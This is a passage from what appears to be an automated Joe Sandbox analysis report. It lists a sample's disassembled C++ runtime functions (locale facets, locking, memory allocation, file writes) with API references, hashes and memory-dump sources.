                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                  • String ID:
                                                                  • API String ID: 419941038-0
                                                                  • Opcode ID: f35deb63aba556823ff4e1592c24e164bb4597e566c6e7d1ecfa55a7448818b1
                                                                  • Instruction ID: 960945c576e35c6723aaaae8e3c5c7b8e712acf963ab6b140426a53a5c1cac00
                                                                  • Opcode Fuzzy Hash: f35deb63aba556823ff4e1592c24e164bb4597e566c6e7d1ecfa55a7448818b1
                                                                  • Instruction Fuzzy Hash: 9601C031900129DFCB15FB6498516BEB7F1FF84720F284889E518AB292DF749E00CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32B20 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32B27
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32B31
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • moneypunct.LIBCPMT ref: 00B32B6B
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32B82
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32BA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                  • String ID:
                                                                  • API String ID: 419941038-0
                                                                  • Opcode ID: 96dffa4329a7ab589dde7362493a56d656c77c430611ee2bec1e980e57379617
                                                                  • Instruction ID: 5839053d234c6e6969c71aa75476bb97f42d6d3b25b3377a9f9244560d1e95e9
                                                                  • Opcode Fuzzy Hash: 96dffa4329a7ab589dde7362493a56d656c77c430611ee2bec1e980e57379617
                                                                  • Instruction Fuzzy Hash: 00018C36910229DBCB15FB649852ABEB7F1FF84720F380589E5186B292DF749E408B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3EB2C Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3EB33
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3EB3D
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • moneypunct.LIBCPMT ref: 00B3EB77
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3EB8E
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3EBAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                  • String ID:
                                                                  • API String ID: 419941038-0
                                                                  • Opcode ID: 9e1e78b14d110259780a605a35a70d371dfe0fd5d69ab33df5295921e043275d
                                                                  • Instruction ID: 21d5e81dda29a3ee224dd0a49d3557bde54eb441398736e78d80ed1db611cf8a
                                                                  • Opcode Fuzzy Hash: 9e1e78b14d110259780a605a35a70d371dfe0fd5d69ab33df5295921e043275d
                                                                  • Instruction Fuzzy Hash: A301C036910129DFCB15EB64D8916BEB7F0FF84710F24058AE4296B2D1DF74DE008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32D74 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32D7B
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32D85
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • numpunct.LIBCPMT ref: 00B32DBF
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32DD6
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32DF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                  • String ID:
                                                                  • API String ID: 743221004-0
                                                                  • Opcode ID: e02b7d772df067024a067d63a3217188e4e01c8c6ede35fdc8b658db5d579a28
                                                                  • Instruction ID: f65a984fd1d11fb9aea71889b13e30c077fe0a662f8a2ac34008b86892b88fa0
                                                                  • Opcode Fuzzy Hash: e02b7d772df067024a067d63a3217188e4e01c8c6ede35fdc8b658db5d579a28
                                                                  • Instruction Fuzzy Hash: 2201C0369002299BCB05FBA4D8116BEB7F0FF84720F380499E4186B291CF749E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B42C4E Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C58
                                                                  • LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C8B
                                                                  • RtlWakeAllConditionVariable.NTDLL ref: 00B42D02
                                                                  • SetEvent.KERNEL32(?,00B22427,00B7E638,00B66B40), ref: 00B42D0C
                                                                  • ResetEvent.KERNEL32(?,00B22427,00B7E638,00B66B40), ref: 00B42D18
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                  • String ID:
                                                                  • API String ID: 3916383385-0
                                                                  • Opcode ID: 96d59f8b3365c8f4eb819b7e4bbd0c3aed68c40cf2d5a3ee9afad4f87a2c16e2
                                                                  • Instruction ID: 40326a09ec53303258c84c25ae720c223101d3235723e09da34a04bd94a0918a
                                                                  • Opcode Fuzzy Hash: 96d59f8b3365c8f4eb819b7e4bbd0c3aed68c40cf2d5a3ee9afad4f87a2c16e2
                                                                  • Instruction Fuzzy Hash: EB014631A04120DFC725AF18FC48A987BB5FF4978570004AAF80A93370CF741981DBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2BB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,00000018,823FDEC6,?,00000000), ref: 00B2BBA3
                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00B2BD7F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                  • String ID: false$true
                                                                  • API String ID: 3924972193-2658103896
                                                                  • Opcode ID: 2ce9a807083158e5e3b05d7ecb2aedf431a041f0044fcea581103ba64020bc32
                                                                  • Instruction ID: ca5062e178174bac8caf5fd8cbcf45cdcd7f58e30a8154cf90de5857688c9cdf
                                                                  • Opcode Fuzzy Hash: 2ce9a807083158e5e3b05d7ecb2aedf431a041f0044fcea581103ba64020bc32
                                                                  • Instruction Fuzzy Hash: 3161A6B1D00758DBDB10CFA4C841BDEB7F8FF14704F1446AAE859AB281EB75AA44CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3D3CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3D3D2
                                                                    • Part of subcall function 00B3254E: __EH_prolog3.LIBCMT ref: 00B32555
                                                                    • Part of subcall function 00B3254E: std::_Lockit::_Lockit.LIBCPMT ref: 00B3255F
                                                                    • Part of subcall function 00B3254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00B325D0
                                                                  • _Find_elem.LIBCPMT ref: 00B3D46E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                  • String ID: %.0Lf$0123456789-
                                                                  • API String ID: 2544715827-3094241602
                                                                  • Opcode ID: a59672e8678a8c1365770684f61f873a0e10843953208a0a12d91db4e766369f
                                                                  • Instruction ID: c3a60be9f6f17c301644aa0830fdc50e15c167754f2fa587d41fbac1f827fb53
                                                                  • Opcode Fuzzy Hash: a59672e8678a8c1365770684f61f873a0e10843953208a0a12d91db4e766369f
                                                                  • Instruction Fuzzy Hash: BC417E31A00218DFCF15DFA8D880ADEBBF5FF18314F200199E815AB255DB70EA56CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3D66F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3D676
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28657
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28679
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B286A1
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2880E
                                                                  • _Find_elem.LIBCPMT ref: 00B3D712
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                  • String ID: 0123456789-$0123456789-
                                                                  • API String ID: 3042121994-2494171821
                                                                  • Opcode ID: 92ff8a4fdb2f62653de8a0faddac667433df35d4780061753990972d6543c444
                                                                  • Instruction ID: db5bdd94afe535e91c81056b9b1819e82624ce0046ece16bf4e5ba57b7cb684b
                                                                  • Opcode Fuzzy Hash: 92ff8a4fdb2f62653de8a0faddac667433df35d4780061753990972d6543c444
                                                                  • Instruction Fuzzy Hash: A1415D71900218DFCF15EFA8E8819DEBBF9FF18314F200199E815AB255DB70EA56CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B4175A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B41761
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292A0
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292C2
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B292EA
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B29422
                                                                  • _Find_elem.LIBCPMT ref: 00B417FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                  • String ID: 0123456789-$0123456789-
                                                                  • API String ID: 3042121994-2494171821
                                                                  • Opcode ID: 9f5c97a8960a3efa31ad650812cc9dd4fcf259ac2e928eaaf2e29a82ef23ae53
                                                                  • Instruction ID: 3b2957de00225868d6181c6d8fd252deb945b376bbe32c94fcd0bac3987ab6fb
                                                                  • Opcode Fuzzy Hash: 9f5c97a8960a3efa31ad650812cc9dd4fcf259ac2e928eaaf2e29a82ef23ae53
                                                                  • Instruction Fuzzy Hash: 46417C71D00218EFCF05EFA8D881A9EBBF5FF14314F10059AE815AB252DB74DA42DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B38386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3838D
                                                                    • Part of subcall function 00B31C42: _Maklocstr.LIBCPMT ref: 00B31C62
                                                                    • Part of subcall function 00B31C42: _Maklocstr.LIBCPMT ref: 00B31C7F
                                                                    • Part of subcall function 00B31C42: _Maklocstr.LIBCPMT ref: 00B31C9C
                                                                    • Part of subcall function 00B31C42: _Maklocchr.LIBCPMT ref: 00B31CAE
                                                                    • Part of subcall function 00B31C42: _Maklocchr.LIBCPMT ref: 00B31CC1
                                                                  • _Mpunct.LIBCPMT ref: 00B3841A
                                                                  • _Mpunct.LIBCPMT ref: 00B38434
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                  • String ID: $+xv
                                                                  • API String ID: 2939335142-1686923651
                                                                  • Opcode ID: 1138f34b9e421bff5f53588317ce1b804d9eb690a079379819603cd2d23cdc05
                                                                  • Instruction ID: bfabba402b7636a61ef8c3917ac42dc5c1631b7eaf3c1296d1b09916c1c3f277
                                                                  • Opcode Fuzzy Hash: 1138f34b9e421bff5f53588317ce1b804d9eb690a079379819603cd2d23cdc05
                                                                  • Instruction Fuzzy Hash: 5F21C4B1804B926ED725DF79C48073BBEF8AB08700F140A9AF459C7A42D774E601CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3FFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Mpunct$H_prolog3
                                                                  • String ID: $+xv
                                                                  • API String ID: 4281374311-1686923651
                                                                  • Opcode ID: f78f95769a418a8861bfdec67375334060b9c97175a6065991481a3a7039f25c
                                                                  • Instruction ID: 0944b40613661c9a9537b371a9b08be1d7da9466b49c8adcad15b0ffc642138f
                                                                  • Opcode Fuzzy Hash: f78f95769a418a8861bfdec67375334060b9c97175a6065991481a3a7039f25c
                                                                  • Instruction Fuzzy Hash: 0E21C4B1904B556ED721EF74849073BBEF8AB08300F144A9AE499C7A42D374E701CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B224C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00B21434,?,00000000), ref: 00B22569
                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00B21434,?,00000000), ref: 00B22589
                                                                  • LocalFree.KERNEL32(?,00B21434,?,00000000), ref: 00B225DF
                                                                  • CloseHandle.KERNEL32(00000000,823FDEC6,?,00000000,00B63C40,000000FF,00000008,?,?,?,?,00B21434,?,00000000), ref: 00B22633
                                                                  • LocalFree.KERNEL32(?,823FDEC6,?,00000000,00B63C40,000000FF,00000008,?,?,?,?,00B21434), ref: 00B22647
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Local$AllocFree$CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 1291444452-0
                                                                  • Opcode ID: f03ac0fd51501bca2ae19ac14e6c44bf631d98bbf5d9124bb8042f0cb41e8bb3
                                                                  • Instruction ID: a012d7ef32a584fd7849c4c9ba07c96a04692f093ca5e8f0244360ab7900d055
                                                                  • Opcode Fuzzy Hash: f03ac0fd51501bca2ae19ac14e6c44bf631d98bbf5d9124bb8042f0cb41e8bb3
                                                                  • Instruction Fuzzy Hash: 64410C72600321BBC7149F38E894B5AB7D8EF59360F1047AAF92AC76E0DB74DD4487A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B61D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetConsoleOutputCP.KERNEL32(823FDEC6,?,00000000,?), ref: 00B61DFE
                                                                    • Part of subcall function 00B5A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B56F5E,?,00000000,-00000008), ref: 00B5AA67
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B62059
                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B620A1
                                                                  • GetLastError.KERNEL32 ref: 00B62144
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                  • String ID:
                                                                  • API String ID: 2112829910-0
                                                                  • Opcode ID: 3f25242d09a6794c785daef7865edbe6273cf640f8a0e34f902dedcde5e145b3
                                                                  • Instruction ID: 1c489e2b42ce87b29811648c839ff73c42177c49362c1b52d6def1c081f663f3
                                                                  • Opcode Fuzzy Hash: 3f25242d09a6794c785daef7865edbe6273cf640f8a0e34f902dedcde5e145b3
                                                                  • Instruction Fuzzy Hash: EED187B5D046489FDF05CFA8D880AADBBF8FF09304F1845AAE929EB351D734A945CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B335F7 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: _strcspn$H_prolog3_ctype
                                                                  • String ID:
                                                                  • API String ID: 838279627-0
                                                                  • Opcode ID: 4c1fbeae65817869df80e11c941db82685616cceebe520a13d113ca8ec6ecd3e
                                                                  • Instruction ID: 1214dfed66c15f28a951106bb910923251dac14ae0f10928af617b669dec7f75
                                                                  • Opcode Fuzzy Hash: 4c1fbeae65817869df80e11c941db82685616cceebe520a13d113ca8ec6ecd3e
                                                                  • Instruction Fuzzy Hash: 68B15CB5900249EFDF11DF98C881AEEBBF9FF48710F244199E805AB251D730AE55CB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2DA6F Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: _strcspn$H_prolog3_ctype
                                                                  • String ID:
                                                                  • API String ID: 838279627-0
                                                                  • Opcode ID: 85f1776d1861aeb38400bfecc0900ba3f6e311584490891d65bf7b6ddd347877
                                                                  • Instruction ID: 1441dd68ad6f8e5c3566b7e9f82a1b5bfe648c9737080a735daa36d3ce87622e
                                                                  • Opcode Fuzzy Hash: 85f1776d1861aeb38400bfecc0900ba3f6e311584490891d65bf7b6ddd347877
                                                                  • Instruction Fuzzy Hash: 57B15B71D00269DFDF10DF94D881AEEBBF9EF08300F144599E819AB216D770AE46CB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B45A58 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
